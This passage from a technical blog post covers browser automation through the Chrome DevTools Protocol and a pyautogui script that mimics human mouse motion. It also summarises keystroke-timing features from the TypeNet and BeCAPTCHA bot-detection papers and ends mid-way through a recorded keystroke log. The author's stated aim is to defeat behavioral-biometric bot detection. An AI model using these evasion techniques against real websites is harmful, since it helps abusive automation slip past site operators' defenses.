<span class="nx">y</span><span class="o">:</span> <span class="nx">offset</span><span class="p">.</span><span class="nx">offsetY</span> <span class="o">+</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">y</span><span class="p">,</span>
<span class="nx">width</span><span class="o">:</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">width</span><span class="p">,</span>
<span class="nx">height</span><span class="o">:</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">height</span><span class="p">,</span>
<span class="p">};</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">css_selector</span><span class="p">,</span> <span class="nx">retVal</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">retVal</span><span class="p">;</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">client</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">getCoords</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">argv</span><span class="p">[</span><span class="mf">2</span><span class="p">]);</span>
</code></pre></div>
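<p>One caveat: the script above interpolates the selector directly into a single-quoted string, so a selector that itself contains a single quote, such as <code>a[href='/login']</code>, breaks the evaluated expression. A minimal sketch of one way to harden this is to let <code>JSON.stringify</code> produce the string literal. The helper name <code>buildRectExpression</code> is hypothetical and not part of the original script. Its return value would be passed as <code>expression</code> to <code>Runtime.evaluate</code>.</p>

```javascript
// Build the expression for Runtime.evaluate. JSON.stringify turns the
// selector into a correctly quoted and escaped JavaScript string literal,
// and the arrow function avoids leaking a variable into the page.
function buildRectExpression(cssSelector) {
  const literal = JSON.stringify(cssSelector);
  return `(() => { const el = document.querySelector(${literal}); ` +
    `return el ? JSON.stringify(el.getClientRects()) : null; })()`;
}

console.log(buildRectExpression("a[href='/login']"));
```

<p>If no element matches, the expression evaluates to <code>null</code>, so the caller still has to handle that case before parsing the result.</p>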
<h3>Obtaining the HTML of the current page</h3>
<p>Grabbing the HTML code of the current page can also be implemented in a straightforward fashion with the CDP. Save the following script as <code>page_source.js</code>.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// page_source.js</span>
<span class="kd">const</span> <span class="nx">CDP</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-remote-interface'</span><span class="p">);</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getPageSource</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">client</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="c1">// connect to endpoint</span>
<span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">CDP</span><span class="p">();</span>
<span class="c1">// extract domains</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">Page</span><span class="p">,</span> <span class="nx">Runtime</span><span class="p">,</span> <span class="nx">DOM</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">client</span><span class="p">;</span>
<span class="c1">// enable events then start!</span>
<span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">([</span><span class="nx">Page</span><span class="p">.</span><span class="nx">enable</span><span class="p">(),</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">enable</span><span class="p">(),</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">enable</span><span class="p">()]);</span>
<span class="c1">// get the page source</span>
<span class="kd">const</span> <span class="nx">rootNode</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">getDocument</span><span class="p">({</span> <span class="nx">depth</span><span class="o">:</span> <span class="o">-</span><span class="mf">1</span> <span class="p">});</span>
<span class="kd">const</span> <span class="nx">pageSource</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">getOuterHTML</span><span class="p">({</span>
<span class="nx">nodeId</span><span class="o">:</span> <span class="nx">rootNode</span><span class="p">.</span><span class="nx">root</span><span class="p">.</span><span class="nx">nodeId</span>
<span class="p">});</span>
<span class="k">return</span> <span class="nx">pageSource</span><span class="p">.</span><span class="nx">outerHTML</span><span class="p">;</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">client</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">getPageSource</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">pageSource</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">pageSource</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<h3>Controlling the Mouse and Keyboard</h3>
<p>Of course it's also necessary to control the mouse and keyboard in order to navigate a website. The straightforward way would be to use puppeteer's keyboard and mouse interaction functionality such as <code>page.click()</code> or <code>page.type()</code>. However, I strongly discourage using them for the reasons discussed above.</p>
<p>Instead, my suggestion is to use a proper desktop automation library such as <code>pyautogui</code> in case you want to use Python.</p>
<p>Here, it is essential to simulate organic human mouse (or touchscreen) and typing interactions as closely as possible. Put differently, we want to defend against the research that investigates the <em>suitability of behavioral biometrics to distinguish between computers and humans</em>.</p>
<p><a href="https://arxiv.org/abs/2005.00890">Recent research</a> suggests several ways to mimic human mouse movement behavior as closely as possible.</p>
<p>There are two papers of considerable interest here:</p>
<ol>
<li>Analyzing keystrokes: <strong>TypeNet: Deep Learning Keystroke Biometrics</strong> <a href="https://arxiv.org/abs/2101.05570">PDF</a></li>
<li>Research on how to mimic human mouse movements: <strong>BeCAPTCHA-Mouse: Synthetic Mouse Trajectories and Improved Bot Detection</strong> <a href="https://arxiv.org/abs/2005.00890">PDF</a></li>
</ol>
<p>In this blog post, I don't have the means to dig deep into the listed papers. Instead, I am going to present the main finding of each of the two papers and develop a simplified function that mimics human mouse/keyboard interaction. It is of course not perfect, but perfection is not the goal here.</p>
<p>In my opinion, the main statement of the BeCAPTCHA-Mouse paper is:</p>
<blockquote>
<p>By looking at typical mouse movements, we can observe some
aspects typically performed by humans during mouse trajectories execution: an
initial acceleration and final deceleration performed by the antagonist (activate
the movement) and agonist muscles (opposing joint torque), and a fine-
correction in the direction at the end of the trajectory when the mouse cursor
gets close to the click button (characterized by a low velocity that serves to
improve the precision of the movement). These aspects motivated us to use
neuromotor analysis to find distinctive features in human mouse movements.
Neuromotor-fine skills, that are unique of human beings are difficult to emulate
for bots and could provide distinctive features in order to tell humans and bots
apart.</p>
</blockquote>
<p>And because a picture is worth a thousand words:</p>
<figure>
<img src="https://incolumitas.com/images/becaptcha.png" alt="Mouse Movement Speed Profile" />
<figcaption>Image taken from the BeCAPTCHA paper: Example of the mouse task determined by 8 keypoints: the crosses represent the keypoint where the user must click, red circles are the (x,y) coordinates obtained from the mouse device, and the black line is the mouse trajectory.<span style="font-size: 60%"></span></figcaption>
</figure>
<p>This is my very amateurish attempt at implementing the lesson taken from the BeCAPTCHA paper, using <code>pyautogui</code> for mouse movements. Store the following Python script as <code>mouse.py</code>.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pyautogui</span>
<span class="kn">import</span> <span class="nn">random</span>


<span class="k">def</span> <span class="nf">someWhereRandomClose</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">max_dist</span><span class="o">=</span><span class="mi">120</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Find a random position close to (x, y)</span>
<span class="sd">    with maximal dist @max_dist</span>
<span class="sd">    """</span>
    <span class="n">shape</span> <span class="o">=</span> <span class="n">pyautogui</span><span class="o">.</span><span class="n">size</span><span class="p">()</span>
    <span class="n">cnt</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
        <span class="n">randX</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">max_dist</span><span class="p">)</span>
        <span class="n">randY</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">max_dist</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
            <span class="n">randX</span> <span class="o">*=</span> <span class="o">-</span><span class="mi">1</span>
        <span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
            <span class="n">randY</span> <span class="o">*=</span> <span class="o">-</span><span class="mi">1</span>
        <span class="k">if</span> <span class="n">x</span> <span class="o">+</span> <span class="n">randX</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">shape</span><span class="o">.</span><span class="n">width</span><span class="p">)</span> <span class="ow">and</span> <span class="n">y</span> <span class="o">+</span> <span class="n">randY</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">shape</span><span class="o">.</span><span class="n">height</span><span class="p">):</span>
            <span class="k">return</span> <span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">randX</span><span class="p">,</span> <span class="n">y</span> <span class="o">+</span> <span class="n">randY</span><span class="p">)</span>
        <span class="n">cnt</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="k">if</span> <span class="n">cnt</span> <span class="o">></span> <span class="mi">15</span><span class="p">:</span>
            <span class="k">return</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">humanMove</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Moves like a human to the coordinate (x, y) and</span>
<span class="sd">    clicks on the coordinate.</span>
<span class="sd">    Randomizes move time and the move type.</span>
<span class="sd">    Visits one intermediate coordinate close to the target before</span>
<span class="sd">    fine correcting and clicking on the target coordinates.</span>
<span class="sd">    """</span>
    <span class="n">close_x</span><span class="p">,</span> <span class="n">close_y</span> <span class="o">=</span> <span class="n">someWhereRandomClose</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
    <span class="c1"># move to an intermediate target close to the destination</span>
    <span class="c1"># start fast, end slow</span>
    <span class="n">pyautogui</span><span class="o">.</span><span class="n">moveTo</span><span class="p">(</span><span class="n">close_x</span><span class="p">,</span> <span class="n">close_y</span><span class="p">,</span> <span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.19</span><span class="p">,</span> <span class="mf">.75</span><span class="p">),</span> <span class="n">pyautogui</span><span class="o">.</span><span class="n">easeOutQuad</span><span class="p">)</span>
    <span class="c1"># click on the main target</span>
    <span class="n">pyautogui</span><span class="o">.</span><span class="n">moveTo</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">.65</span><span class="p">))</span>
    <span class="n">pyautogui</span><span class="o">.</span><span class="n">click</span><span class="p">()</span>


<span class="n">humanMove</span><span class="p">(</span><span class="mi">800</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">800</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">1000</span><span class="p">,</span> <span class="mi">600</span><span class="p">)</span>
</code></pre></div>
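<p>To get a bit closer to the acceleration/deceleration behavior described in the quote, one could also generate the trajectory points by hand. The following is only a rough sketch and not taken from the paper: the helper names <code>min_jerk</code> and <code>human_like_path</code>, the quadratic Bezier curve, the minimum-jerk polynomial and all default parameters are my own assumptions. It uses nothing but the standard library, so it can be tried without moving the real mouse.</p>

```python
import math
import random


def min_jerk(t):
    """Progress profile from 0 to 1 with zero velocity at both ends (assumed model)."""
    return 10 * t**3 - 15 * t**4 + 6 * t**5


def human_like_path(start, end, steps=50, curve=0.2, jitter=1.5, rng=None):
    """Return a list of (x, y) points from start to end.

    The path is a quadratic Bezier curve whose control point is pushed
    sideways by a random amount. Progress along the curve follows the
    min_jerk profile: slow start, fast middle, slow end.
    All parameters are illustrative guesses, not measured values.
    """
    rng = rng or random.Random()
    (x0, y0), (x1, y1) = start, end
    dx, dy = x1 - x0, y1 - y0
    dist = math.hypot(dx, dy)
    # control point: midpoint shifted perpendicular to the straight line
    offset = rng.uniform(-curve, curve) * dist
    if dist > 0:
        cx = (x0 + x1) / 2 - dy / dist * offset
        cy = (y0 + y1) / 2 + dx / dist * offset
    else:
        cx, cy = x0, y0
    points = []
    for i in range(steps + 1):
        s = min_jerk(i / steps)
        x = (1 - s) ** 2 * x0 + 2 * (1 - s) * s * cx + s**2 * x1
        y = (1 - s) ** 2 * y0 + 2 * (1 - s) * s * cy + s**2 * y1
        # small random tremor on the intermediate points only
        if 0 < i < steps:
            x += rng.gauss(0, jitter)
            y += rng.gauss(0, jitter)
        points.append((round(x), round(y)))
    return points


path = human_like_path((100, 100), (800, 400), rng=random.Random(42))
```

<p>Each point of <code>path</code> could then be passed to <code>pyautogui.moveTo(x, y)</code> with a short pause in between. Because the points are evenly spaced in time but not in distance, the cursor covers little ground at the beginning and at the end and a lot in the middle.</p>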
<p>And what is the most important statement from the <strong>TypeNet: Deep Learning Keystroke Biometrics</strong> paper?</p>
<p>Honestly, this paper was hard to understand, since it discusses many technical aspects, such as the ideal ML architecture and the best loss function (<em>Contrastive loss</em>, <em>Triplet loss</em> or <em>Softmax loss</em>).</p>
<p>But in my opinion, the graphic below explains the aspect that is most relevant to this blog post's purpose.</p>
<figure>
<img src="https://incolumitas.com/images/key-features.png" alt="Keystroke timing features" />
<figcaption>Image taken from the TypeNet paper: Fig. 1. Example of the 4 temporal features extracted between two consecutive keys: Hold Latency (HL), Inter-key Latency (IL), Press Latency
(PL), and Release Latency (RL).<span style="font-size: 60%"></span></figcaption>
</figure>
<p>There are four different temporal latencies that can be collected from free-text typing recordings:</p>
<ol>
<li>Hold Latency (HL)</li>
<li>Inter-key Latency (IL)</li>
<li>Press Latency (PL)</li>
<li>Release Latency (RL)</li>
</ol>
<p>The idea is that those four features carry biometric information about the person who is typing.</p>
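<p>As a rough illustration, the four latencies can be computed from a list of key events like this. This is only a sketch under my reading of the figure: HL is release minus press of the same key, IL is the press of the next key minus the release of the current one, PL is the time between two consecutive presses and RL the time between two consecutive releases. The function name <code>keystroke_features</code>, the simplified <code>(kind, code, timestamp)</code> tuple layout and the sample timestamps (in milliseconds) are assumptions made for this example.</p>

```python
def keystroke_features(events):
    """Compute HL, IL, PL and RL for each pair of consecutive keys.

    events: list of (kind, code, timestamp_ms) tuples sorted by time,
    where kind is "kd" (keydown) or "ku" (keyup).
    Assumes a key is released before the same key is pressed again.
    """
    presses = []    # [code, press_time, release_time] in press order
    open_keys = {}  # code -> index in presses of the still-held key
    for kind, code, ts in events:
        if kind == "kd":
            if code in open_keys:
                continue  # auto-repeat while the key is held: ignore
            open_keys[code] = len(presses)
            presses.append([code, ts, None])
        elif kind == "ku" and code in open_keys:
            presses[open_keys.pop(code)][2] = ts
    # keys that were never released cannot be measured
    done = [p for p in presses if p[2] is not None]
    features = []
    for (c1, d1, u1), (c2, d2, u2) in zip(done, done[1:]):
        features.append({
            "keys": (c1, c2),
            "HL": u1 - d1,  # hold latency of the first key
            "IL": d2 - u1,  # inter-key latency (can be negative)
            "PL": d2 - d1,  # press latency
            "RL": u2 - u1,  # release latency
        })
    return features


# hypothetical sample: "a" and "m" typed with overlapping key presses
sample = [
    ("kd", "KeyA", 2092.9),
    ("kd", "KeyM", 2189.04),
    ("ku", "KeyA", 2252.575),
    ("ku", "KeyM", 2308.535),
]
features = keystroke_features(sample)
```

<p>Note that IL becomes negative whenever the next key is pressed before the previous one is released, which happens all the time when humans type fast.</p>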
<p>Of course, in order to record those features, you must be able to listen to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keyup_event">keyup</a> events, as is the case with JavaScript in modern web browsers.</p>
<p>What does human typing actually look like in terms of <code>keydown</code> and <code>keyup</code> events? I recorded those events while typing the text <em>I am currently listening to "Nothing around us" from Mathame</em>, attached an absolute timestamp from <code>performance.now()</code> to each of them, and this is what I got:</p>
<div class="highlight"><pre><span></span><code><span class="p">[[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1798.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"I"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1876.685</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1989.15</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2012.43</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2092.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2189.04</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2252.575</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2308.535</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyC"</span><span class="p">,</span><span class="s2">"c"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2388.77</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span 
class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2468.72</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyC"</span><span class="p">,</span><span class="s2">"c"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2508.44</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2508.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2612.755</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2684.54</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2764.705</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2796.895</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2900.51</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2916.865</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">2924.835</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3020.795</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3076.53</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3085.245</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3158.005</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3196.57</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyY"</span><span class="p">,</span><span class="s2">"y"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3277.11</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3364.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyY"</span><span class="p">,</span><span class="s2">"y"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3405.69</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3460.55</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span 
class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3812.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3813.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3868.56</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3868.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3916.83</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3917.06</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4005.345</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4005.59</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span 